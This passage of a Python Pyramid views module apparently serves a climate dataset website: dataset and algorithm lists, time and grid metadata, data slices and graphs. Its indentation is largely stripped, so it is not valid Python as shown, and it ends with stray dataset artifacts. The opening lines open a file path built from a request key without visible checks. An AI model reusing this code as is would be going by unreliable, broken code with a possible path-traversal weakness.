pagepath = os.path.join(SITE_LIB_ROOT, key)
try:
page = open(pagepath).read()
return Response(content_type='text/html', body=page)
    except IOError:
return NotFound()
# list of available datasets
@view_config(context=DataList, request_method='GET', renderer='json')
def get_datalist(context, request):
return tasks.get_configs(" ")
# list of algorithms
@view_config(context=AlgList, request_method='GET', renderer='json')
def get_alglist(context, request):
return tasks.alglist()
# random metadata about the dataset
@view_config(context=CCPData, request_method='GET')
def get_objattrs(context, request):
return Response(tasks.objattrs(context, request))
#bundles time and grid in one request/json object
@view_config(context=CCPData, name='menu', request_method='GET', renderer='json')
def get_dsmenu(context, request):
dsmenu = dict(time=tasks.get_time(context))
dsmenu.update(tasks.get_grid(context))
return dsmenu
# Returns dictionary of valid ranges
@view_config(context=CCPData, name='validrange', request_method='GET', renderer='json')
def get_valid_range(context, request):
return tasks.valid_range(context)
# returns time as a long space-separated string that is
# used to populate the autocomplete widget
@view_config(context=CCPData, name='time', request_method='GET')
def get_time(context, request):
time = tasks.get_time(context)
return Response("\n".join(time))
# bundles the lat and lon arrays/list into a json object
@view_config(context=CCPData, name='grid', request_method='GET', renderer='json')
def get_grid(context, request):
latlon = tasks.get_grid(context)
return latlon
# returns the data/doesn't quite work as expected
@view_config(context=CCPData, name='data', request_method='GET')
def get_data(context, request):
image = tasks.select_data(context, request.subpath)
return Response(image)
# returns the graph as a response
@view_config(context=CCPData, name='graph', request_method='GET')
def make_graph(context, request):
image = tasks.select_data(context, request.subpath)
graph_obj = tasks.set_graph(context, image.ndim)
return tasks.drawgraph(graph_obj, image, request.subpath)
# 404 page-should be replaced with something fun
@view_config(context='pyramid.exceptions.NotFound')
def notfound_view(self):
return Response('404: Page Not Found.')
# used to test stuff/part of the paster default
def my_view(request):
return {'project':'ccpweb'}
|
[
"[email protected]"
] |